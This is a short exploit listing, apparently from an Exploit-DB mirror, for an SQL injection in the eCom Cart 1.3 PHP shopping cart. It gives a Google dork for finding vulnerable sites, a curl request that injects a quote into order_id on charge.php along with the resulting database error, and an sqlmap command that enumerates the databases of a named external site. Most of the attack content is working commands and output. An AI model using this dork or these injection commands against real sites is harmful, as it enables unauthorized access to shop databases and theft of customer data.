dea52f68f5
8 new exploits Disk Sorter 9.7.14 - 'Input Directory' Local Buffer Overflow Disk Sorter 9.7.14 - 'Input Directory' Local Buffer Overflow (PoC) Disk Sorter 9.7.14 - 'Input Directory' Local Buffer Overflow VMware vSphere Data Protection 5.x/6.x - Java Deserialization EFS Easy Chat Server 3.1 - Buffer Overflow (SEH) IPFire 2.19 - Remote Code Execution eCom Cart 1.3 - SQL Injection EFS Easy Chat Server 3.1 - Password Disclosure EFS Easy Chat Server 3.1 - Password Reset PaulShop - SQL Injection
28 lines
1.1 KiB
Text
Executable file
28 lines
1.1 KiB
Text
Executable file
# Exploit Title: eCom Cart 1.3 Exploit
|
|
# Google Dork: inurl:"/pdetails/11" ([11] is variable)
|
|
# Date: 10.06.2017
|
|
# Exploit Author: Alperen Eymen Ozcan & Batuhan Camci
|
|
# Vendor Homepage: https://codecanyon.net/item/ecom-cart-a-php-shopping-cart-with-blog/13731007
|
|
# Software Link: https://codecanyon.net/item/ecom-cart-a-php-shopping-cart-with-blog/13731007
|
|
# Version: 1.3
|
|
# Tested on: Linux
|
|
|
|
|
|
|
|
$ curl http://localhost/ecom-cart/charge.php -d order_id=%271
|
|
|
|
Fatal error: Uncaught PDOException: SQLSTATE[42000]: Syntax error or access
|
|
violation: 1064 You have an error in your SQL syntax; check the manual
|
|
that corresponds to your MariaDB server version for the right syntax
|
|
to use near '1'' at line 1 in
|
|
/customers/4/4/9/lobisdev.one/httpd.www/ecom-cart/charge.php:16
|
|
Stack trace:
|
|
#0 /customers/4/4/9/lobisdev.one/httpd.www/ecom-cart/charge.php(16):
|
|
PDO->query('SELECT * FROM 3...')
|
|
#1 {main}
|
|
thrown in /customers/4/4/9/lobisdev.one/httpd.www/ecom-cart/charge.php
|
|
on line 16
|
|
|
|
$ sqlmap -u "http://www.lobisdev.one/ecom-cart/charge.php' --data=order_id=1 --dbs
|
|
|
|
|